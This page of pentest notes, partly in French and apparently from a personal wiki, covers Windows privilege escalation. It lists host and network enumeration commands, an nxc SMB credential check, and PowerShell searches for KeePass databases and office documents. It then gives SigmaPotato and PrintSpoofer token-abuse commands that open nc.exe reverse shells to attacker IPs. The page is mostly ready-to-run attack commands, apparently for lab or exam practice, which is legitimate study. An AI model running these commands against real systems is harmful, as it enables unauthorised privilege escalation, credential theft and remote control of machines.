Privilege Escalation

Enumeration

cmd

hostname
whoami /all
systeminfo

net accounts
netstat -ano
route print

Enumeration NXC

nxc smb <ip> -u 'user' -p 'pass'

Recherche de fichiers :

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Privileges

SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege : Token Abuse ⇒ https://github.com/tylerdotrar/SigmaPotato

SigmaPotato with a reverse shell

./potato.exe --revshell 192.168.45.228 5555
./potato.exe ".\nc.exe 192.168.45.228 6666 -e cmd" #avec nc.exe

PrintSpoofer with a nc reverse shell

.\PrintSpoofer64.exe -c ".\nc.exe 192.168.45.183 4444 -e cmd

PreviousEnumeration NextCommands

Last updated 4 months ago

Good afternoon

Enumeration

Privileges